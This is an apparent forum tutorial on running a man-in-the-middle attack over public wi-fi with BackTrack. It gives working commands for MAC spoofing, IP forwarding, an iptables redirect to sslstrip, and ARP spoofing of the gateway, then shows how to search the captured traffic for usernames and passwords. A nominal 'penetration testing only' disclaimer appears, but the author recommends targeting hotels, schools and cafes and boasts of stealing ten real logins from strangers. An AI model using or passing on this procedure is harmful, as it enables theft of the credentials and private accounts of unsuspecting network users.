MITM

Ok first of all what you need to run this attack using the method i will show you:
-You need to be running a backtrack OS [3/4/R1]
-To be connected to a wireless network [Any form of encryption]
-Wireless traffic

And thats it! This is going to be a short but sweet tutorial!

**This guide is intended for the sole purpose of penetration testing only**

Running Backtrack
I think that there are other methods of performing this attack that don't depend on you running Backtrack, but since i am assuming that you have cracked a network running backtrack i don't see why this should be a problem. Also this method is very easy;]

First of all you need to be running a version of backtrack, for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, that covers several methods of booting backtrack from all OS's.

Finding targets
Second of all You need to be connected to a wireless network with network traffic; this can basically be anywhere and any form of wireless network, if you are connected you can attack!

A good method of maximising the affect of this attack is to target wi-fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafe's and any free public wi-fi spots. These are great as they don't require any cracking!

Optional

However if you have cracked a network, then you can use your wi-fi adapter that is capable of going into monitor mode to search for the best wi-fi network. The most common wi-fi adapter capable fo doing this is the ALFA AWUS036H, for more information and info on how to monitor wireless networks and spoof MAC addresses refer to my WPA/WPA2 cracking tutorial. This will allow you to better survey the area and choose a target network with the most clients.

Spoofing your MAC address
If you want to be safe then it is a good idea to spoof your MAC address, luckily for this attack you don't need a wireless card capable of packet injection any card should do fine =] This means that you only need to type the following into a terminal

Code:

ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up

Where i have written wlan0 you will have to put the name of your wireless interface; however unless you have two wireless cards it is most probably "wlan0". If yu do have 2 wireless cards then you will know what to do ;]

The attack
This is the easy part! all you need to do is enter the following into a terminal

Code:

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sslstrip -w passwords

This will forward all wi-fi traffic back to the client so no one gets suspicious. It will also create a document on your desktop called "passwords" leave this well alone for now. Another key part of this attack is SSLstrip, this allows you to steal the info from secure web pages. (Hotmail, Facebook, Gmail, Ebay etc...)

Now leave that terminal open and open a new one. Now we need to find out the name of the gateway that we will be redirecting traffic to. To do this simply type "route" into the terminal and wait for a minute.

You should see something like this:

As you can see from this the gate way that my wi-fi traffic is going through is called "BThomehub.Home"; and the interface connected is wlan1 We now use this info when entering the next command.

Side note: You can also use:

Code:

route -n | grep 'UG[ \t]' | awk '{print $2}'

To show the IP address of the router. This is much more reliable as sometimes the gateway can be cut off. This is also useful if you are using ettercap.

Code:

arpspoof -i <interface> <gateway>

This will commence the MITM attack the screen should look something like this:

Now leave both of the open terminals running, they are now capturing all of the data sent across the wi-fi. Have a coffee, do your homework, go to a meeting. The longer you leave it the higher chance you will have of catching something juicy!

Processing the data
You will now have a large text or html file on your desktop, these are your results, don't open them just yet. Protip: If you have a slow computer with a low amount of RAM don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favorite editor. I just use Kate advanced text editor; Which ever one you use it needs to have a search function.

I would upload some screen caps of me doing this but i don't have any one to target to generate the file =[ so sorry about that.

In Kate once you have opened the file press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to un-tick "case sensitive".

Now the fun bit! Search the document for the following:
password=
password
pass=
pass
username=
username
user=
user
email...

Be creative and think for others. Bascially keep searching through the document unitl you come across "username=Middle, password=i<3HF" then look above for the website they were on and walla you have acquired a login!

In under 2 hours in a hotel with unsecured wi-fi i got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD

Hope you enjoyed, please leave feedback =]

This attack also works for wired connections, to do this you need to change the interface you use to the interface that is connected to the wired network. To determine what this device is use the following.

Code:

ifconfig

Now just look for the interface that has the IP address and use that instead of wlan0. All credits go to ac1dxtrem for this protip =]